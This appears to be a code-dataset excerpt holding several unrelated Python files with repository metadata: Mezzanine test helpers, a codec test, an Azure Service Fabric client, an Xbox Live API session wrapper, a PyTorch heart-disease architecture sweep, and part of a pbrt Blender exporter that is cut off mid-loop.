92fa94aa3053f4fda7bcef9b44b96fa1ebbf6860
|
[
"BSD-2-Clause"
] | 19
|
2017-01-12T09:20:03.000Z
|
2019-06-18T14:53:32.000Z
|
from __future__ import unicode_literals
from future.builtins import open, range, str
from _ast import PyCF_ONLY_AST
import os
from shutil import copyfile, copytree
from django.contrib.auth import get_user_model
from django.db import connection
from django.template import Context, Template
from django.test import TestCase as BaseTestCase
from django.test.client import RequestFactory
from mezzanine.conf import settings
from mezzanine.utils.importing import path_for_import
# Ignore these warnings in pyflakes - if added to, please comment why.
IGNORE_ERRORS = (
# Used to version subpackages.
".__version__' imported but unused",
# No caching fallback.
"redefinition of function 'nevercache'",
# Dummy fallback in templates for django-compressor.
"redefinition of function 'compress'",
# Fabic config fallback.
"redefinition of unused 'conf'",
# Fixing these would make the code ugiler IMO.
"continuation line",
"closing bracket does not match",
# Jython compatiblity.
"redefinition of unused 'Image",
# Django custom user compatibility.
"'get_user_model' imported but unused",
# lambdas are OK.
"do not assign a lambda",
)
class TestCase(BaseTestCase):
"""
This is the base test case providing common features for all tests
across the different apps in Mezzanine.
"""
def setUp(self):
"""
Creates an admin user, sets up the debug cursor, so that we can
track the number of queries used in various places, and creates
a request factory for views testing.
"""
self._username = "test"
self._password = "test"
self._emailaddress = "example@example.com"
args = (self._username, self._emailaddress, self._password)
self._user = get_user_model().objects.create_superuser(*args)
self._request_factory = RequestFactory()
self._debug_cursor = connection.force_debug_cursor
connection.force_debug_cursor = True
def tearDown(self):
"""
Clean up the admin user created and debug cursor.
"""
self._user.delete()
connection.force_debug_cursor = self._debug_cursor
def queries_used_for_template(self, template, **context):
"""
Return the number of queries used when rendering a template
string.
"""
connection.queries_log.clear()
t = Template(template)
t.render(Context(context))
return len(connection.queries)
def create_recursive_objects(self, model, parent_field, **kwargs):
"""
Create multiple levels of recursive objects.
"""
per_level = list(range(3))
for _ in per_level:
kwargs[parent_field] = None
level1 = model.objects.create(**kwargs)
for _ in per_level:
kwargs[parent_field] = level1
level2 = model.objects.create(**kwargs)
for _ in per_level:
kwargs[parent_field] = level2
model.objects.create(**kwargs)
def copy_test_to_media(module, name):
"""
Copies a file from Mezzanine's test data path to MEDIA_ROOT.
Used in tests and demo fixtures.
"""
mezzanine_path = path_for_import(module)
test_path = os.path.join(mezzanine_path, "static", "test", name)
to_path = os.path.join(settings.MEDIA_ROOT, name)
to_dir = os.path.dirname(to_path)
if not os.path.exists(to_dir):
os.makedirs(to_dir)
if os.path.isdir(test_path):
copy = copytree
else:
copy = copyfile
try:
copy(test_path, to_path)
except OSError:
pass
def _run_checker_for_package(checker, package_name, extra_ignore=None):
"""
Runs the checker function across every Python module in the
given package.
"""
ignore_strings = IGNORE_ERRORS
if extra_ignore:
ignore_strings += extra_ignore
package_path = path_for_import(package_name)
for (root, dirs, files) in os.walk(str(package_path)):
for f in files:
if (f == "local_settings.py" or not f.endswith(".py") or
root.split(os.sep)[-1] in ["migrations"]):
# Ignore
continue
for warning in checker(os.path.join(root, f)):
for ignore in ignore_strings:
if ignore in warning:
break
else:
yield warning.replace(package_path, package_name, 1)
def run_pyflakes_for_package(package_name, extra_ignore=None):
"""
If pyflakes is installed, run it across the given package name
returning any warnings found.
"""
from pyflakes.checker import Checker
def pyflakes_checker(path):
with open(path, "U") as source_file:
source = source_file.read()
try:
tree = compile(source, path, "exec", PyCF_ONLY_AST)
except (SyntaxError, IndentationError) as value:
info = (path, value.lineno, value.args[0])
yield "Invalid syntax in %s:%d: %s" % info
else:
result = Checker(tree, path)
for warning in result.messages:
yield str(warning)
args = (pyflakes_checker, package_name, extra_ignore)
return _run_checker_for_package(*args)
def run_pep8_for_package(package_name, extra_ignore=None):
"""
If pep8 is installed, run it across the given package name
returning any warnings or errors found.
"""
import pep8
class Checker(pep8.Checker):
"""
Subclass pep8's Checker to hook into error reporting.
"""
def __init__(self, *args, **kwargs):
super(Checker, self).__init__(*args, **kwargs)
self.report_error = self._report_error
def _report_error(self, line_number, offset, text, check):
"""
Store pairs of line numbers and errors.
"""
self.errors.append((line_number, text.split(" ", 1)[1]))
def check_all(self, *args, **kwargs):
"""
Assign the errors attribute and return it after running.
"""
self.errors = []
super(Checker, self).check_all(*args, **kwargs)
return self.errors
def pep8_checker(path):
for line_number, text in Checker(path).check_all():
yield "%s:%s: %s" % (path, line_number, text)
args = (pep8_checker, package_name, extra_ignore)
return _run_checker_for_package(*args)
| 31.907767
| 72
| 0.630762
|
a3eef047d7ffe31a7cc5a4f08a79b7cf02c34fb3
| 370
|
py
|
Python
|
third_party/python/Lib/test/test_codecmaps_hk.py
|
appotry/cosmopolitan
|
af4687cc3f2331a23dc336183ab58fe001cda082
|
[
"ISC"
] | null | null | null |
third_party/python/Lib/test/test_codecmaps_hk.py
|
appotry/cosmopolitan
|
af4687cc3f2331a23dc336183ab58fe001cda082
|
[
"ISC"
] | null | null | null |
third_party/python/Lib/test/test_codecmaps_hk.py
|
appotry/cosmopolitan
|
af4687cc3f2331a23dc336183ab58fe001cda082
|
[
"ISC"
] | null | null | null |
#
# test_codecmaps_hk.py
# Codec mapping tests for HongKong encodings
#
from test import multibytecodec_support
import unittest
class TestBig5HKSCSMap(multibytecodec_support.TestBase_Mapping,
unittest.TestCase):
encoding = 'big5hkscs'
mapfileurl = '/zip/.python/test/BIG5HKSCS-2004.TXT'
if __name__ == "__main__":
unittest.main()
| 23.125
| 63
| 0.721622
|
88a0f5eda9f041e42a7c068ef86f5c2a1e798a82
| 97
|
py
|
Python
|
tests/pitchShift.py
|
skratchdot/media-tools
|
bca0c683fb637aeefda1c49454a118f809047d97
|
[
"MIT"
] | 13
|
2019-12-09T07:56:13.000Z
|
2021-08-03T01:45:53.000Z
|
tests/pitchShift.py
|
skratchdot/media-tools
|
bca0c683fb637aeefda1c49454a118f809047d97
|
[
"MIT"
] | 1
|
2020-04-29T00:00:14.000Z
|
2021-07-09T14:24:19.000Z
|
tests/pitchShift.py
|
skratchdot/media-tools
|
bca0c683fb637aeefda1c49454a118f809047d97
|
[
"MIT"
] | 3
|
2020-04-27T15:36:36.000Z
|
2021-03-29T17:52:35.000Z
|
# -*- coding: utf-8 -*-
import librosa
y, sr = librosa.load("../media/sample/speech_clip.wav")
| 16.166667
| 55
| 0.639175
|
420ccd342c06516e9e81defb7773dbed9e67232b
| 4,478
|
py
|
Python
|
sdk/servicefabric/azure-servicefabric/azure/servicefabric/_service_fabric_client_ap_is.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/servicefabric/azure-servicefabric/azure/servicefabric/_service_fabric_client_ap_is.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/servicefabric/azure-servicefabric/azure/servicefabric/_service_fabric_client_ap_is.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import SDKClient
from msrest import Serializer, Deserializer
from ._configuration import ServiceFabricClientAPIsConfiguration
from .operations import ServiceFabricClientAPIsOperationsMixin
from .operations import MeshSecretOperations
from .operations import MeshSecretValueOperations
from .operations import MeshVolumeOperations
from .operations import MeshNetworkOperations
from .operations import MeshApplicationOperations
from .operations import MeshServiceOperations
from .operations import MeshCodePackageOperations
from .operations import MeshServiceReplicaOperations
from .operations import MeshGatewayOperations
from . import models
class ServiceFabricClientAPIs(ServiceFabricClientAPIsOperationsMixin, SDKClient):
"""Service Fabric REST Client APIs allows management of Service Fabric clusters, applications and services.
:ivar config: Configuration for client.
:vartype config: ServiceFabricClientAPIsConfiguration
:ivar mesh_secret: MeshSecret operations
:vartype mesh_secret: azure.servicefabric.operations.MeshSecretOperations
:ivar mesh_secret_value: MeshSecretValue operations
:vartype mesh_secret_value: azure.servicefabric.operations.MeshSecretValueOperations
:ivar mesh_volume: MeshVolume operations
:vartype mesh_volume: azure.servicefabric.operations.MeshVolumeOperations
:ivar mesh_network: MeshNetwork operations
:vartype mesh_network: azure.servicefabric.operations.MeshNetworkOperations
:ivar mesh_application: MeshApplication operations
:vartype mesh_application: azure.servicefabric.operations.MeshApplicationOperations
:ivar mesh_service: MeshService operations
:vartype mesh_service: azure.servicefabric.operations.MeshServiceOperations
:ivar mesh_code_package: MeshCodePackage operations
:vartype mesh_code_package: azure.servicefabric.operations.MeshCodePackageOperations
:ivar mesh_service_replica: MeshServiceReplica operations
:vartype mesh_service_replica: azure.servicefabric.operations.MeshServiceReplicaOperations
:ivar mesh_gateway: MeshGateway operations
:vartype mesh_gateway: azure.servicefabric.operations.MeshGatewayOperations
:param credentials: Subscription credentials which uniquely identify
client subscription.
:type credentials: None
:param str base_url: Service URL
"""
def __init__(
self, credentials, base_url=None):
self.config = ServiceFabricClientAPIsConfiguration(credentials, base_url)
super(ServiceFabricClientAPIs, self).__init__(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self.api_version = '8.2'
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.mesh_secret = MeshSecretOperations(
self._client, self.config, self._serialize, self._deserialize)
self.mesh_secret_value = MeshSecretValueOperations(
self._client, self.config, self._serialize, self._deserialize)
self.mesh_volume = MeshVolumeOperations(
self._client, self.config, self._serialize, self._deserialize)
self.mesh_network = MeshNetworkOperations(
self._client, self.config, self._serialize, self._deserialize)
self.mesh_application = MeshApplicationOperations(
self._client, self.config, self._serialize, self._deserialize)
self.mesh_service = MeshServiceOperations(
self._client, self.config, self._serialize, self._deserialize)
self.mesh_code_package = MeshCodePackageOperations(
self._client, self.config, self._serialize, self._deserialize)
self.mesh_service_replica = MeshServiceReplicaOperations(
self._client, self.config, self._serialize, self._deserialize)
self.mesh_gateway = MeshGatewayOperations(
self._client, self.config, self._serialize, self._deserialize)
| 50.314607
| 111
| 0.756141
|
162bf4d30ece1e561415bcd3deb71e40d9058b1d
| 5,797
|
py
|
Python
|
xbox/webapi/api/client.py
|
Elon-Maks/xbox-webapi-python
|
14fc5cda72038ad3e71ee9fbd36f7d7b27f4f787
|
[
"MIT"
] | null | null | null |
xbox/webapi/api/client.py
|
Elon-Maks/xbox-webapi-python
|
14fc5cda72038ad3e71ee9fbd36f7d7b27f4f787
|
[
"MIT"
] | null | null | null |
xbox/webapi/api/client.py
|
Elon-Maks/xbox-webapi-python
|
14fc5cda72038ad3e71ee9fbd36f7d7b27f4f787
|
[
"MIT"
] | null | null | null |
"""
Xbox Live Client
Basic factory that stores :class:`XboxLiveLanguage`, User authorization data
and available `Providers`
"""
import logging
from typing import Any
from aiohttp import hdrs
from aiohttp.client import ClientResponse
from ms_cv import CorrelationVector
from xbox.webapi.api.language import DefaultXboxLiveLanguages, XboxLiveLanguage
from xbox.webapi.api.provider.account import AccountProvider
from xbox.webapi.api.provider.achievements import AchievementsProvider
from xbox.webapi.api.provider.catalog import CatalogProvider
from xbox.webapi.api.provider.cqs import CQSProvider
from xbox.webapi.api.provider.gameclips import GameclipProvider
from xbox.webapi.api.provider.lists import ListsProvider
from xbox.webapi.api.provider.message import MessageProvider
from xbox.webapi.api.provider.people import PeopleProvider
from xbox.webapi.api.provider.presence import PresenceProvider
from xbox.webapi.api.provider.profile import ProfileProvider
from xbox.webapi.api.provider.screenshots import ScreenshotsProvider
from xbox.webapi.api.provider.smartglass import SmartglassProvider
from xbox.webapi.api.provider.titlehub import TitlehubProvider
from xbox.webapi.api.provider.usersearch import UserSearchProvider
from xbox.webapi.api.provider.userstats import UserStatsProvider
from xbox.webapi.authentication.manager import AuthenticationManager
log = logging.getLogger("xbox.api")
class Session:
def __init__(self, auth_mgr: AuthenticationManager):
self._auth_mgr = auth_mgr
self._cv = CorrelationVector()
async def request(
self,
method: str,
url: str,
include_auth: bool = True,
include_cv: bool = True,
**kwargs: Any,
) -> ClientResponse:
"""Proxy Request and add Auth/CV headers."""
headers = kwargs.pop("headers", {})
params = kwargs.pop("params", None)
data = kwargs.pop("data", None)
# Extra, user supplied values
extra_headers = kwargs.pop("extra_headers", None)
extra_params = kwargs.pop("extra_params", None)
extra_data = kwargs.pop("extra_data", None)
if include_auth:
# Ensure tokens valid
await self._auth_mgr.refresh_tokens()
# Set auth header
headers[
hdrs.AUTHORIZATION
] = self._auth_mgr.xsts_token.authorization_header_value
if include_cv:
headers["MS-CV"] = self._cv.increment()
# Extend with optionally supplied values
if extra_headers:
headers.update(extra_headers)
if extra_params:
# query parameters
params = params or {}
params.update(extra_params)
if extra_data:
# form encoded post data
data = data or {}
data.update(extra_data)
session = kwargs.pop("session", None)
if session is None:
if self._auth_mgr.session is None:
raise Exception('Failed! If AuthenticationManager is created with proxy_sesssions session for requsts '
'should be passed explicitly, through "session" argument')
return await self._auth_mgr.session.request(
method, url, **kwargs, headers=headers, params=params, data=data
)
else:
return await session.request(
method, url, **kwargs, headers=headers, params=params, data=data
)
async def get(self, url: str, **kwargs: Any) -> ClientResponse:
return await self.request(hdrs.METH_GET, url, **kwargs)
async def options(self, url: str, **kwargs: Any) -> ClientResponse:
return await self.request(hdrs.METH_OPTIONS, url, **kwargs)
async def head(self, url: str, **kwargs: Any) -> ClientResponse:
return await self.request(hdrs.METH_HEAD, url, **kwargs)
async def post(self, url: str, **kwargs: Any) -> ClientResponse:
return await self.request(hdrs.METH_POST, url, **kwargs)
async def put(self, url: str, **kwargs: Any) -> ClientResponse:
return await self.request(hdrs.METH_PUT, url, **kwargs)
async def patch(self, url: str, **kwargs: Any) -> ClientResponse:
return await self.request(hdrs.METH_PATCH, url, **kwargs)
async def delete(self, url: str, **kwargs: Any) -> ClientResponse:
return await self.request(hdrs.METH_DELETE, url, **kwargs)
class XboxLiveClient:
def __init__(
self,
auth_mgr: AuthenticationManager,
language: XboxLiveLanguage = DefaultXboxLiveLanguages.United_States,
):
self._auth_mgr = auth_mgr
self.session = Session(auth_mgr)
self._language = language
self.cqs = CQSProvider(self)
self.lists = ListsProvider(self)
self.profile = ProfileProvider(self)
self.achievements = AchievementsProvider(self)
self.usersearch = UserSearchProvider(self)
self.gameclips = GameclipProvider(self)
self.people = PeopleProvider(self)
self.presence = PresenceProvider(self)
self.message = MessageProvider(self)
self.userstats = UserStatsProvider(self)
self.screenshots = ScreenshotsProvider(self)
self.titlehub = TitlehubProvider(self)
self.account = AccountProvider(self)
self.catalog = CatalogProvider(self)
self.smartglass = SmartglassProvider(self)
@property
def xuid(self) -> str:
"""
Gets the Xbox User ID
Returns: Xbox user Id
"""
return self._auth_mgr.xsts_token.xuid
@property
def language(self) -> XboxLiveLanguage:
"""
Gets the active Xbox Live Language
Returns: Active Xbox Live language
"""
return self._language
| 36.23125
| 119
| 0.671899
|
bf4af9db552cee6c1d9dc665f6da6a64444ee87e
| 3,123
|
py
|
Python
|
HeartNet.py
|
royJackman/SineCircleMappings
|
8638689e7efdb41f277e766e0144686c12b1cc16
|
[
"MIT"
] | 1
|
2021-06-13T16:26:43.000Z
|
2021-06-13T16:26:43.000Z
|
HeartNet.py
|
royJackman/SineCircleMappings
|
8638689e7efdb41f277e766e0144686c12b1cc16
|
[
"MIT"
] | null | null | null |
HeartNet.py
|
royJackman/SineCircleMappings
|
8638689e7efdb41f277e766e0144686c12b1cc16
|
[
"MIT"
] | 1
|
2021-06-13T16:29:15.000Z
|
2021-06-13T16:29:15.000Z
|
import json
import torch
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from colour import Color
from MixedNet import MixedNet
from mpl_toolkits.mplot3d import Axes3D
torch.manual_seed(0)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
cols = ['age', 'sex', 'cp', 'trestbps', 'chol', 'fbs', 'restecg', 'thalach', 'exang', 'oldpeak', 'slope', 'ca', 'thal', 'target']
data = pd.read_csv('Data/heart.csv')
data = torch.tensor(data[cols].values).double()
target = data[:, -1:]
data = data[:, :-1]
plot_data = [[], [], []]
best = []
examples = data.shape[0]
epochs = 300
colors = 1000
layer_width = 16
eighty = int(0.8 * examples)
twenty = examples - eighty
performance_statistics = {}
architectures = []
for i in range(0, layer_width):
rem = layer_width - i
for j in range(0, rem):
mod = rem - j
architectures.append([[i, j, layer_width - (i+j)], [i, j, layer_width - (i+j)], [layer_width, layer_width]])
for i, a in enumerate(architectures):
res = a.pop()
print(f'Model {i + 1}: {len(res)} layer(s) with size(s) {a}')
# for j, l in enumerate(a):
# print(f'Layer {j+1}: {l[0]} sin, {l[1]} tanh, {l[2]} log')
model = MixedNet(13, 1, res, a).double()
crit = torch.nn.MSELoss()
opti = torch.optim.Adam(model.parameters(), lr = 0.01)
arch_loss = 0.0
min_arch = 1000.0
arch_test = 0.0
for e in range(epochs):
i = 0
batch = 0
epoch_loss = 0.0
while i < eighty:
opti.zero_grad()
batch += 1
last = i
i = min(last + 64, eighty)
pred = model(data[last:i, :].double())
loss = crit(pred, target[last:i].double())
epoch_loss += loss.item()
loss.backward(retain_graph=True)
opti.step()
arch_loss += epoch_loss/float(epochs)
pred = model(data[eighty:].double())
loss = crit(pred, target[eighty:].double())
if loss.item() < min_arch:
min_arch = loss.item()
arch_test += loss.item()/float(epochs)
plot_data[0].append(a[0][0])
plot_data[1].append(a[0][1])
plot_data[2].append(a[0][2])
best.append(min_arch)
performance_statistics[f'Layer {a[0][0]} sin, {a[0][1]} tanh, {a[0][2]} log'] = min_arch
# print(f'Avg train MSE: {arch_loss}, Avg test MSE: {arch_test}, Best test MSE: {min_arch}\n----------------------')
# with open('heartnet.json', 'w') as f:
# json.dump(performance_statistics, f)
gradient = list(Color('blue').range_to(Color('orange'), colors))
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
print(min(best), max(best))
mn = min(best)
best = [b - mn for b in best]
mx = max(best)
best = [int((b*colors)/mx) for b in best]
best = [gradient[max(0, min(b, colors-1))].hex for b in best]
ax.scatter(*plot_data, c=best)
# ax.suptitle(f'Lowest loss after 300 epochs in network with 2 layers with [30, 30] nodes')
ax.set_xlabel('Sin nodes')
ax.set_ylabel('Tanh nodes')
ax.set_zlabel('Log nodes')
# grad = fig.add_subplot(1, 4, 4)
# grad.imshow([[]])
plt.show()
| 30.320388
| 129
| 0.600384
|
ddfc72d2a6f7bcd98007ee6a133fdc6dc953ff61
| 313,362
|
py
|
Python
|
exporters/blender/pbrtBlend.py
|
patwonder/pbrt-v2-skin
|
a6a58e5287925798c2d37adea6054dbec4587e4b
|
[
"BSD-2-Clause"
] | 3
|
2020-12-09T00:03:29.000Z
|
2021-07-03T13:31:41.000Z
|
exporters/blender/pbrtBlend.py
|
patwonder/pbrt-v2-skin
|
a6a58e5287925798c2d37adea6054dbec4587e4b
|
[
"BSD-2-Clause"
] | null | null | null |
exporters/blender/pbrtBlend.py
|
patwonder/pbrt-v2-skin
|
a6a58e5287925798c2d37adea6054dbec4587e4b
|
[
"BSD-2-Clause"
] | 1
|
2020-11-28T12:33:24.000Z
|
2020-11-28T12:33:24.000Z
|
#!BPY
# -*- coding: utf-8 -*-
# coding=utf-8
"""Registration info for Blender menus:
Name: 'pbrt v2.0 alpha Exporter'
Blender: 248
Group: 'Render'
Tooltip: 'Export/Render to pbrt v2.0 scene format (.pbrt)'
"""
__author__ = "radiance, zuegs, ideasman42, luxblender, dougal2, mmp"
__version__ = "0.6"
__url__ = [
"http://www.pbrt.org/",
]
__bpydoc__ = """\
This exporter is based on the LuxBlend v0.6 exporter.
Useful links:
- For updates: http://www.luxrender.net/forum/viewforum.php?f=11
- For Blender Tutorial: http://www.luxrender.net/wiki/index.php/Tutorial_1:_Your_first_scene_%26_render
Usage:
- Run the script from the render menu.
- Set the default location of the pbrt.exe.
"""
#
# ***** BEGIN GPL LICENSE BLOCK *****
#
# --------------------------------------------------------------------------
# LuxBlend v0.6 exporter
# --------------------------------------------------------------------------
#
# Authors:
# radiance, zuegs, ideasman42, luxblender, dougal2
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
######################################################
# Importing modules
######################################################
import math
import time
import os
import sys as osys
import types
import subprocess
import Blender
from Blender import Mesh, Scene, Object, Material, Texture, Window, sys, Draw, BGL, Mathutils, Lamp, Image
######################################################
# Functions
######################################################
# New name based on old with a different extension
def newFName(ext):
return Blender.Get('filename')[: -len(Blender.Get('filename').split('.', -1)[-1]) ] + ext
# some helpers
def luxstr(str):
return str.replace("\\", "\\\\")
### relpath ##########################
def relpath(base, target):
if target[0:2] == "\\\\" or target[0:2] == "//":
return target[2:len(target)]
if not os.path.isabs(base):
base = os.path.abspath(base)
if not os.path.isabs(target):
target = os.path.abspath(target)
if os.sep == "\\":
base = os.path.normcase(base)
target = os.path.normcase(target)
if base == os.sep:
return '.' + target
baselist = base.split(os.sep)
if baselist[-1] == "":
baselist = baselist[:-1]
targetlist = target.split(os.sep)
i = 0
top = min([len(baselist), len(targetlist)])
while i < top and baselist[i] == targetlist[i]:
i+=1
if i == 0:
return os.sep.join(targetlist)
if i == len(baselist):
return os.sep.join(targetlist[i:])
else:
return ('..' + os.sep) * (len(baselist) - i) + os.sep.join(targetlist[i:])
### luxFilePath #####################
lxs_filename = ""
previewing = False
def luxFilePath(filename):
global lxs_filename, previewing
scn = Scene.GetCurrent()
pm = luxProp(scn, "pathmode", "absolute").get()
if (pm=="absolute") or previewing: # absolute paths (the old / default mode)
return filename
elif pm=="relative": # relative paths
base = os.path.dirname(lxs_filename)
return relpath(base, filename)
elif pm=="flat": # flat mode - only filename
return os.path.basename(filename)
###### RGC ##########################
def rg(col):
scn = Scene.GetCurrent()
if luxProp(scn, "RGC", "true").get()=="true":
gamma = luxProp(scn, "film.gamma", 2.2).get()
else:
gamma = 1.0
ncol = col**gamma
if luxProp(scn, "colorclamp", "false").get()=="true":
ncol = ncol * 0.9
if ncol > 0.9:
ncol = 0.9
if ncol < 0.0:
ncol = 0.0
return ncol
def texturegamma():
scn = Scene.GetCurrent()
if luxProp(scn, "RGC", "true").get()=="true":
return luxProp(scn, "film.gamma", 2.2).get()
else:
return 1.0
def exportMaterial(mat):
str = "# Material '%s'\n" %mat.name
return str+luxMaterial(mat)+"\n"
def exportMaterialGeomTag(mat):
return "%s\n"%(luxProp(mat, "link", "").get())
################################################################
dummyMat = 2394723948 # random identifier for dummy material
clayMat = None
#-------------------------------------------------
# getMaterials(obj)
# helper function to get the material list of an object in respect of obj.colbits
#-------------------------------------------------
def getMaterials(obj, compress=False):
global clayMat
mats = [None]*16
colbits = obj.colbits
objMats = obj.getMaterials(1)
data = obj.getData(mesh=1)
try:
dataMats = data.materials
except:
try:
dataMats = data.getMaterials(1)
except:
dataMats = []
colbits = 0xffff
m = max(len(objMats), len(dataMats))
if m>0:
objMats.extend([None]*16)
dataMats.extend([None]*16)
for i in range(m):
if (colbits & (1<<i) > 0):
mats[i] = objMats[i]
else:
mats[i] = dataMats[i]
if compress:
mats = [m for m in mats if m]
slots = [m for m in mats if m]
if m==0 or not slots:
print("Warning: object %s has no material assigned" % (obj.getName()))
mats = []
# clay option
if luxProp(Scene.GetCurrent(), "clay", "false").get()=="true":
if clayMat==None: clayMat = Material.New("lux_clayMat")
for i in range(len(mats)):
if mats[i]:
mattype = luxProp(mats[i], "type", "").get()
if (mattype not in ["portal","light","boundvolume"]): mats[i] = clayMat
return mats
######################################################
# luxExport class
######################################################
class luxExport:
#-------------------------------------------------
# __init__
# initializes the exporter object
#-------------------------------------------------
def __init__(self, scene):
self.scene = scene
self.camera = scene.objects.camera
self.objects = []
self.portals = []
self.volumes = []
self.meshes = {}
self.materials = []
self.lights = []
self.duplis = set()
#-------------------------------------------------
# analyseObject(self, obj, matrix, name)
# called by analyseScene to build the lists before export
#-------------------------------------------------
def analyseObject(self, obj, matrix, name, isOriginal=True, isDupli=False):
light = False
if (obj.users > 0):
obj_type = obj.getType()
if (obj.enableDupFrames and isOriginal):
for o, m in obj.DupObjects:
self.analyseObject(o, m, "%s.%s"%(name, o.getName()), False)
if (obj.enableDupGroup or obj.enableDupVerts or obj.enableDupFaces):
self.duplis.add(obj)
for o, m in obj.DupObjects:
self.analyseObject(o, m, "%s.%s"%(name, o.getName()), True, True)
elif ((isDupli or (not obj.getParent() in self.duplis)) and ((obj_type == "Mesh") or (obj_type == "Surf") or (obj_type == "Curve") or (obj_type == "Text"))):
mats = getMaterials(obj)
if (len(mats)>0) and (mats[0]!=None) and ((mats[0].name=="PORTAL") or (luxProp(mats[0], "type", "").get()=="portal")):
self.portals.append([obj, matrix])
elif (len(mats)>0) and (luxProp(mats[0], "type", "").get()=="boundvolume"):
self.volumes.append([obj, matrix])
else:
for mat in mats:
if (mat!=None) and (mat not in self.materials):
self.materials.append(mat)
if (mat!=None) and ((luxProp(mat, "type", "").get()=="light") or (luxProp(mat, "emission", "false").get()=="true")):
light = True
mesh_name = obj.getData(name_only=True)
try:
self.meshes[mesh_name] += [obj]
except KeyError:
self.meshes[mesh_name] = [obj]
self.objects.append([obj, matrix])
elif (obj_type == "Lamp"):
ltype = obj.getData(mesh=1).getType() # data
if (ltype == Lamp.Types["Lamp"]) or (ltype == Lamp.Types["Spot"]) or (ltype == Lamp.Types["Area"]):
self.lights.append([obj, matrix])
light = True
return light
#-------------------------------------------------
# analyseScene(self)
# this function builds the lists of object, lights, meshes and materials before export
#-------------------------------------------------
def analyseScene(self):
light = False
for obj in self.scene.objects:
if ((obj.Layers & self.scene.Layers) > 0):
if self.analyseObject(obj, obj.getMatrix(), obj.getName()): light = True
return light
#-------------------------------------------------
# exportMaterialLink(self, file, mat)
# exports material link. LuxRender "Material"
#-------------------------------------------------
def exportMaterialLink(self, file, mat):
if mat == dummyMat:
file.write("\tMaterial \"matte\" # dummy material\n")
else:
file.write("\t%s"%exportMaterialGeomTag(mat)) # use original methode
#-------------------------------------------------
# exportMaterial(self, file, mat)
# exports material. LuxRender "Texture"
#-------------------------------------------------
def exportMaterial(self, file, mat):
print("material %s"%(mat.getName()))
file.write("\t%s"%exportMaterial(mat)) # use original methode
#-------------------------------------------------
# exportMaterials(self, file)
# exports materials to the file
#-------------------------------------------------
def exportMaterials(self, file):
for mat in self.materials:
self.exportMaterial(file, mat)
#-------------------------------------------------
# getMeshType(self, vertcount, mat)
# returns type of mesh as string to use depending on thresholds
#-------------------------------------------------
def getMeshType(self, vertcount, mat):
scn = Scene.GetCurrent()
if mat != dummyMat:
usesubdiv = luxProp(mat, "subdiv", "false")
# usedisp = luxProp(mat, "dispmap", "false")
# sharpbound = luxProp(mat, "sharpbound", "false")
# nsmooth = luxProp(mat, "nsmooth", "true")
# sdoffset = luxProp(mat, "sdoffset", 0.0)
dstr = ""
if usesubdiv.get() == "true":
nlevels = luxProp(mat, "sublevels", 1)
dstr += "\"loopsubdiv\" \"integer nlevels\" [%i] "% (nlevels.get())
# if usedisp.get() == "true":
# dstr += " \"string displacementmap\" [\"%s::dispmap.scale\"] \"float dmscale\" [-1.0] \"float dmoffset\" [%f]"%(mat.getName(), sdoffset.get()) # scale is scaled in texture
if dstr != "": return dstr
return "\"trianglemesh\""
#-------------------------------------------------
# exportMeshOpt(self, file, mesh, mats, name, portal, optNormals)
# exports mesh to the file with optimization.
# portal: export without normals and UVs
# optNormals: speed and filesize optimization, flat faces get exported without normals
#-------------------------------------------------
def exportMeshOpt(self, file, mesh, mats, name, portal=False, optNormals=True):
shapeList, smoothFltr, shapeText = [0], [[0,1]], [""]
if portal:
return
else:
uvFltr, normalFltr, shapeText = [1], [1], ["mixed with normals"] # normals and UVs
if optNormals: # one pass for flat faces without normals and another pass for smoothed faces with normals, all with UVs
shapeList, smoothFltr, normalFltr, uvFltr, shapeText = [0,1], [[0],[1]], [0,1], [1,1], ["flat w/o normals", "smoothed with normals"]
if mats == []:
mats = [dummyMat]
usedmats = [f.mat for f in mesh.faces]
for matIndex in range(len(mats)):
if not matIndex in usedmats:
continue
if not(portal):
mat = mats[matIndex]
if not mat:
mat = dummyMat
self.exportMaterialLink(file, mat)
for shape in shapeList:
blenderExportVertexMap = []
exportVerts = []
exportFaces = []
ffaces = [f for f in mesh.faces if (f.mat == matIndex) and (f.smooth in smoothFltr[shape])]
for face in ffaces:
exportVIndices = []
index = 0
for vertex in face:
# v = [vertex.co[0], vertex.co[1], vertex.co[2]]
v = [vertex.co]
if normalFltr[shape]:
if (face.smooth):
# v.extend(vertex.no)
v.append(vertex.no)
else:
# v.extend(face.no)
v.append(face.no)
if (uvFltr[shape]) and (mesh.faceUV):
# v.extend(face.uv[index])
v.append(face.uv[index])
blenderVIndex = vertex.index
newExportVIndex = -1
length = len(v)
if (blenderVIndex < len(blenderExportVertexMap)):
for exportVIndex in blenderExportVertexMap[blenderVIndex]:
